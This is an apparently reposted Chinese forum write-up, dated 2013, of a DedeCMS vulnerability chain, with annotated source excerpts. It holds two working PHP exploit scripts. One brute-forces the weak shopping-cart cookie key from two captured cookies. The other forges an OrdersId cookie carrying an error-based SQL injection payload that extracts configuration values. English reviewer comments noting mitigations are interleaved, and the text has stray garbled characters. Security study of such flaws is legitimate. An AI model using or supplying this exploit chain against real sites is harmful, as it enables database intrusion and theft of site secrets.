标题:
织梦CMS漏洞dedecms漏洞SQL注入漏洞
作者:
admin
时间:
2013-2-13 23:58
标题:
织梦CMS漏洞dedecms漏洞SQL注入漏洞
www.xxx.com/plus/search.php?keyword=
在 include/shopcar.class.php中
先看一下这个shopcar类是如何生成cookie的
// Persists a shopping-cart value as a client-side cookie. Arrays are first
// flattened by enCode() (the a=yy&b=cc&... form described in the write-up)
// and every value is then passed through enCrypt() before setcookie().
// NOTE(review): no integrity tag (MAC) is attached — enCrypt() alone is what
// stands between the browser and the stored cart state.
239 function saveCookie($key,$value)
240 {
241 if(is_array($value))
242 {
243 $value = $this->enCrypt($this->enCode($value));
244 }
245 else
246 {
247 $value = $this->enCrypt($value);
248 }
// Cookie lives for 36000 s (10 h) and is scoped to the whole site ('/').
249 setcookie($key,$value,time()+36000,’/');
250 }
简单地说，$key 就是 cookie 的键，$value 就是 cookie 的值；enCode 的作用是把数组转换成 a=yy&b=cc&d=know 这样的查询串形式，关键在于 enCrypt 函数。
// Obfuscates $txt for storage in a cookie. A fresh per-call key is drawn from
// rand(0, 32000), so $encrypt_key can take only 32001 distinct values.
// For every input byte the loop emits the key byte in the clear followed by
// (input byte ^ key byte): $tmp is twice the length of $txt and fully exposes
// the per-call key. The only secret applied afterwards is the site-wide key
// inside setKey(), so with a known $txt this collapses to a small brute force,
// which is exactly what the write-up below demonstrates.
// Mitigation (defender's note): use authenticated encryption (or at minimum an
// HMAC over the payload) with a secret derived from a CSPRNG; never derive
// keys from rand()/srand(microtime()).
186 function enCrypt($txt)
187 {
// Clock-seeded PRNG, then a 0..32000 draw: a tiny key space.
188 srand((double)microtime() * 1000000);
189 $encrypt_key = md5(rand(0, 32000));
190 $ctr = 0;
191 $tmp = ”;
192 for($i = 0; $i < strlen($txt); $i++)
193 {
// $ctr wraps at strlen($encrypt_key) (32 hex chars): the key repeats every 32 bytes.
194 $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
// Key byte written in the clear, then plaintext XOR that same key byte.
195 $tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
196 }
// Second layer: repeating-key XOR with the site secret (setKey), then base64.
197 return base64_encode($this->setKey($tmp));
198 }
// Repeating-key XOR of $txt with md5(strtolower($cfg_cookie_encode)), the
// site-wide cookie secret. XOR against a known input yields the pad directly,
// so anyone who knows (or can enumerate) the input recovers the 32-byte key
// and can then forge any cookie this class accepts.
// NOTE(review): $cfg_cookie_encode is a DedeCMS global set elsewhere; where it
// comes from is not visible in this excerpt.
213 function setKey($txt)
214 {
215 global $cfg_cookie_encode;
// 32 hex characters, used as a repeating pad below.
216 $encrypt_key = md5(strtolower($cfg_cookie_encode));
217 $ctr = 0;
218 $tmp = ”;
219 for($i = 0; $i < strlen($txt); $i++)
220 {
// Wrap the key index every 32 bytes.
221 $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
222 $tmp .= $txt[$i] ^ $encrypt_key[$ctr++];
223 }
224 return $tmp;
225 }
enCrypt 的参数 $txt 我们是可知的；它的返回值就是 cookie 的值，这个我们同样可知。
" x+ f) _& ^# m7 |$ N) W3 X
然后到了 enCrypt 调用 setKey 时的参数 $tmp，这个参数在某种意义上我们也是可知的，因为 $encrypt_key = md5(rand(0, 32000)); 只有 32000 种可能，我们可以推出 32000 种可能的 $tmp，从而推出 32000 种可能的 md5(strtolower($cfg_cookie_encode))。对了，忘记说了，我们的目的是推测出 setKey 中 $encrypt_key 的值，然后才能任意构造出购物车的 cookie。从推出的 32000 种 md5(strtolower($cfg_cookie_encode)) 中，简单过滤掉含非字母数字字符的 key，就只剩下几百个可能的 key；然后我们再重新下一次订单，再获取几百个可能的 key，两者取交集，得到最终的 key。
具体代码如下:
<?php
$cookie1 = “X2lRPFNlCmlWc1cvAHNXMABjAToHbVcyB3ZXJFIwA20LIAlzU2ULPARyAmQGIVU5VyJbfFVsBiYNN1dsUG0DIl90UTFTLAo3VjBXYgBvVzgAZAEqBz9XagclVzBSbw==”; // here is the first cookie,change here
$cookie2 = “ADYCb1RiBmUDJghwUyAFYlIxW2BROwhtVCUIe1AyC2UOJVMpADYBNgJ0AmRUcw5iAncAJ1JrCSlQalBrAj8CIwArAmJUKwY7A2UIPVM8BWpSNltwUWkINVR2CG9QbQ==”; // here is the second cookie ,change here
$plantxt = “id=2&price=0&units=fun&buynum=1&title=naduohua1″; // here is the text , change here
function reStrCode($code,$string)
{
$code = base64_decode($code);
$key = “”;
for($i=0 ; $i<32 ; $i++)
{
$key .= $string[$i] ^ $code[$i];
}
return $key;
}
function getKeys($cookie,$plantxt)
{
$tmp = $cookie;
$results = array();
for($j=0 ; $j < 32000; $j++)
{
$txt = $plantxt;
$ctr = 0;
$tmp = ”;
$encrypt_key = md5($j);
for($i =0; $i < strlen($txt); $i ++)
{
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
}
$string = $tmp;
$code = $cookie;
$result = reStrCode($code,$string);
if(eregi(‘^[a-z0-9]+$’,$result))
{
echo $result.”\n”;
$results[] = $result;
}
}
return $results;
}
" U* T0 e* n6 A/ r; A
$results1 = getKeys($cookie1,$plantxt);
$results2 = getKeys($cookie2,$plantxt);
print “\n——————–real key————————–\n”;
foreach($results1 as $test1)
{
foreach($results2 as $test2)
{
if($test1 == $test2)
{
echo $test1.”\n”;
}
}
}
?>
cookie1 和 cookie2 是我下了两次订单后分别生成的 cookie。
plantxt 可以根据页面自行推算，大致就是这个格式：id=2&price=0&units=fun&buynum=1&title=naduohua1
然后推算出md5(strtolower($cfg_cookie_encode))
得到这个key之后,我们就可以构造任意购物车的cookie
接着看
20 class MemberShops
21 {
22 var $OrdersId;
23 var $productsId;
24
// Initialises the cart from the client's "OrdersId" cookie; a fresh order id
// is generated only when that cookie is absent or empty.
// NOTE(review): a non-empty client-supplied value is accepted as the order id
// with no validation here, and plus/carbuyaction.php (quoted below) later
// interpolates it into SQL. Once the cookie secret is known the cookie is the
// injection vector. Mitigation: validate the id server-side (allow-list
// pattern / integer cast) and use parameterised queries at the sink.
25 function __construct()
26 {
27 $this->OrdersId = $this->getCookie(“OrdersId”);
28 if(empty($this->OrdersId))
29 {
30 $this->OrdersId = $this->MakeOrders();
31 }
32 }
可以看到，OrdersId 是直接从 cookie 中读取的。
然后
/plus/carbuyaction.php中的
29 $cart = new MemberShops();
// Order id comes straight from the cookie-initialised object (MemberShops::__construct).
39 $OrdersId = $cart->OrdersId; // order id recorded for this request
……
// SINK: $OrdersId is string-interpolated into the query with no escaping or
// parameter binding, so a crafted cookie value reaches the database as SQL.
// Mitigation: bind it as a parameter, or cast/validate it before use.
173 $rows = $dsql->GetOne(“SELECT `oid` FROM #@__shops_orders WHERE oid=’$OrdersId’ LIMIT 0,1″);
由于 $OrdersId 被直接拼接进了 SQL 语句，接着我们就可以注入了。
通过利用下面代码生成cookie:
<?php
$txt = “1′ or 1=@`\’` and (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((select value from #@__sysconfig where aid=3),1,62)))a from information_schema.tables group by a)b) or 1=@`\’` or ’1′=’1″;
$encrypt_key = “9f09293b7419ed68448fb51d5b174834″; // here is the key, please change here
function setKey($txt)
{
global $encrypt_key;
$ctr = 0;
$tmp = ”;
for($i = 0; $i < strlen($txt); $i++)
{
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
$tmp .= $txt[$i] ^ $encrypt_key[$ctr++];
}
return $tmp;
}
function enCrypt($txt)
{
srand((double)microtime() * 1000000);
$encrypt_key = md5(rand(0, 32000));
$ctr = 0;
$tmp = ”;
for($i = 0; $i < strlen($txt); $i++)
{
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
}
return base64_encode(setKey($tmp));
}
for($dest =0;$dest = enCrypt($txt);)
{
if(!strpos($dest,’+'))
{
break;
}
}
echo $dest.”\n”;
?>